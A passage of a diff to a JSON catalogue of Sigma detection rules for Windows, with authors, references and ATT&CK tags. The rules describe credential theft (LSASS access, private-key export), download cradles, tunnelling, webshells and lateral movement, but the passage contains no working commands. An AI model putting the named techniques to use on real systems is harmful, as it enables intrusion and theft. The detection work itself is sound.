"162e69a7-7981-4344-84a9-0f1c9a217a52", - "value": "Powershell Directory Enumeration" - }, - { - "description": "Detects suspicious PowerShell download command", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/05", - "falsepositive": [ - "PowerShell scripts that download content from the Internet" - ], - "filename": "posh_ps_susp_download.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", - "value": "Suspicious PowerShell Download - Powershell Script" - }, - { - "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/02", - "falsepositive": [ - "Legitimate administration script" - ], - "filename": "posh_ps_susp_execute_batch_script.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ] - }, - "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", - "value": "Powershell Execute Batch Script" - }, - { - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/04/23", - "falsepositive": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" - ], - "filename": "posh_ps_susp_export_pfxcertificate.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", - "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ] - }, - "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "value": "Suspicious Export-PfxCertificate" - }, - { - "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/19", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_extracting.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ] - }, - "uuid": "bd5971a7-626d-46ab-8176-ed643f694f68", - "value": "Extracting Information with PowerShell" - }, - { - "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/21", - "falsepositive": [ - "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" - ], - "filename": "posh_ps_susp_follina_execution.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1537919885031772161", - "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Bash/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml" ], "tags": [ "attack.defense_evasion", "attack.t1202" ] }, - "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", - "value": "Troubleshooting Pack Cmdlet Execution" + "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "value": "Suspicious Subsystem for Linux Bash Execution" }, { - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report", "meta": { - "author": "Florian Roth", - "creation_date": "2021/04/23", + "author": "Markus Neis", + "creation_date": 
"2018/06/07", "falsepositive": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], - "filename": "posh_ps_susp_getprocess_lsass.yml", + "filename": "proc_creation_win_lethalhta.yml", "level": "high", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/PythonResponder/status/1385064506049630211", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" + "https://codewhitesec.blogspot.com/2018/07/lethalhta.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lethalhta.yml" ], "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218.005" ] }, - "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "value": "PowerShell Get-Process LSASS in ScriptBlock" + "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "value": "MSHTA Spwaned by SVCHOST" }, { - "description": "Detects suspicious Powershell code that execute COM Objects", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", "meta": { - "author": "frack113", - "creation_date": "2022/04/02", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "creation_date": "2020/03/04", "falsepositive": [ - "Legitimate PowerShell scripts" + "Unlikely" ], - "filename": "posh_ps_susp_gettypefromclsid.yml", - "level": "medium", - "logsource.category": "ps_script", + "filename": "proc_creation_win_mmc20_lateral_movement.yml", + "level": "high", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", + "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc20_lateral_movement.yml" + ], + "tags": [ + "attack.execution", + "attack.t1021.003" + ] + }, + "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "value": "MMC20 Lateral Movement" + }, + { + "description": "Detects a whoami.exe executed by privileged accounts that are often misused by threat actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_whoami_as_priv_user.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://nsudo.m2team.org/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml" ], "tags": [ "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" - ] - }, - "uuid": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", - "value": "Suspicious GetTypeFromCLSID ShellExecute" - }, - { - "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", - "meta": { - "author": "frack113", - "creation_date": "2022/03/17", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml", - 
"level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", - "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1201" - ] - }, - "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", - "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy" - }, - { - "description": "Detects the use of PowerShell to identify the current logged user.", - "meta": { - "author": "frack113", - "creation_date": "2022/04/04", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_get_current_user.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" - ], - "tags": [ "attack.discovery", "attack.t1033" ] }, - "uuid": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", - "value": "Suspicious PowerShell Get Current User" + "uuid": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "value": "Run Whoami as Privileged User" }, { - "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", + "description": "Detects certain 
parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "meta": { - "author": "frack113", - "creation_date": "2022/06/04", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_get_gpo.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", - "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1615" - ] - }, - "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", - "value": "Suspicious GPO Discovery With Get-GPO" - }, - { - "description": "Get the processes that are running on the local computer.", - "meta": { - "author": "frack113", + "author": "Florian Roth", "creation_date": "2022/03/17", "falsepositive": [ - "Legitimate PowerShell scripts" + "Unlikely" ], - "filename": "posh_ps_susp_get_process.yml", - "level": "low", - "logsource.category": "ps_script", + "filename": "proc_creation_win_webshell_hacking.yml", + "level": "high", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1057" - ] - }, - "uuid": "af4c87ce-bdda-4215-b998-15220772e993", - "value": "Suspicious Process 
Discovery With Get-Process" - }, - { - "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", - "meta": { - "author": "frack113", - "creation_date": "2022/01/12", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_gwmi.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/datasources/DS0005/", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" + "https://youtu.be/7aemGhaE9ds?t=641", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml" ], "tags": [ "attack.persistence", - "attack.t1546" + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ] }, - "uuid": "0332a266-b584-47b4-933d-a00b103e1b37", - "value": "Suspicious Get-WmiObject" + "uuid": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "value": "Webshell Hacking Activity Patterns" }, { - "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", - "meta": { - "author": "frack113", - "creation_date": "2022/04/09", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_hyper_v_condlet.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.006" - ] - }, - "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", - "value": "Suspicious Hyper-V Cmdlets" - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "meta": { - "author": "Florian Roth (rule)", - "creation_date": "2017/03/12", - "falsepositive": [ - "Very special / sneaky PowerShell scripts" - ], - "filename": "posh_ps_susp_invocation_generic.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ed965133-513f-41d9-a441-e38076a0798f", - "value": "Suspicious PowerShell Invocations - Generic" - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "meta": { - "author": "Florian Roth (rule), Jonhnathan Ribeiro", - "creation_date": "2017/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_invocation_specific.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "value": "Suspicious PowerShell Invocations - Specific" - }, - { - "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the 
client and server.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/23", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_invoke_webrequest_useragent.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", - "value": "Change User Agents with WebRequest" - }, - { - "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", - "meta": { - "author": "frack113", - "creation_date": "2022/01/09", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_iofilestream.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ] - }, - "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb", - "value": "Suspicious IO.FileStream" - }, - { - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "meta": { - "author": "Florian Roth, Perez Diego (@darkquassar)", - "creation_date": "2019/02/11", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_keywords.yml", - "level": "high", - "logsource.category": "ps_script", - 
"logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", - "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", - "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "value": "Suspicious PowerShell Keywords" - }, - { - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/12", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_local_group_reco.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", - "value": "Suspicious Get Local Groups Information - PowerShell" - }, - { - "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired 
from a users local system, such as Outlook storage or cache files.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/07/21", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_mail_acces.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" - ], - "tags": [ - "attack.collection", - "attack.t1114.001" - ] - }, - "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", - "value": "Powershell Local Email Collection" - }, - { - "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "meta": { - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "creation_date": "2020/10/08", - "falsepositive": [ - "Administrators or Power users may remove their shares via cmd line" - ], - "filename": "posh_ps_susp_mounted_share_deletion.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.005" - ] - }, - "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0", - "value": "PowerShell Deleted Mounted Share" - }, - { - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "meta": { - "author": "frack113", - "creation_date": "2022/02/01", - "falsepositive": [ 
- "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_mount_diskimage.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", - "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.005" - ] - }, - "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", - "value": "Suspicious Mount-DiskImage" - }, - { - "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/27", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_networkcredential.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110.001" - ] - }, - "uuid": "1883444f-084b-419b-ac62-e0d0c5b3693f", - "value": "Suspicious Connection to Remote Account" - }, - { - "description": "Adversaries may use to interact with a remote network share using 
Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", - "meta": { - "author": "frack113", - "creation_date": "2022/08/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_new_psdrive.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "1c563233-030e-4a07-af8c-ee0490a66d3a", - "value": "Suspicious New-PSDrive to Admin Share" - }, - { - "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "description": "The \"Squirrel.exe\" binary that is part of multiple software (Slack, Teams, Discord...etc) can be used as a LOLBIN", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/08", + "creation_date": "2022/06/09", "falsepositive": [ - "Unknown" + "See rule (fa4b21c9-0057-4493-b289-2556416ae4d7) for possible FPs" ], - "filename": "posh_ps_susp_proxy_scripts.yml", + "filename": "proc_creation_win_lolbin_squirrel.yml", "level": "medium", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.defense_evasion", + "attack.execution" ] }, - "uuid": "bd33d2aa-497e-4651-9893-5c5364646595", - "value": "Suspicious TCP Tunnel Via PowerShell Script" + "uuid": "45239e6a-b035-4aaf-b339-8ad379fcb67e", + "value": "Use of Squirrel.exe" }, { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", - "meta": { - "author": "frack113", - "creation_date": "2021/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_recon_export.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119" - ] - }, - "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", - "value": "Recon Information for Export with PowerShell" - }, - { - "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_remove_adgroupmember.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" - ], - "tags": [ - "attack.impact", - "attack.t1531" - ] - }, - "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107", - "value": "Remove Account From Domain Admin Group" - }, - { - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/24", + "creation_date": "2022/09/02", "falsepositive": [ - "Rare intended use of hidden services", - "Rare FP could occure due to the non linearity of the ScriptBlockText log" + "Unlikely" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml", + "filename": "proc_creation_win_reg_add_safeboot.yml", "level": "high", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ] - }, - "uuid": "22d80745-6f2c-46da-826b-77adaededd74", - "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS" - }, - { - "description": "Adversaries may look for folders and drives shared on remote systems as a means 
of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_smb_share_reco.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", - "value": "Suspicious Get Information for SMB Share" - }, - { - "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", - "meta": { - "author": "frack113", - "creation_date": "2022/01/23", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_susp_ssl_keyword.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", - 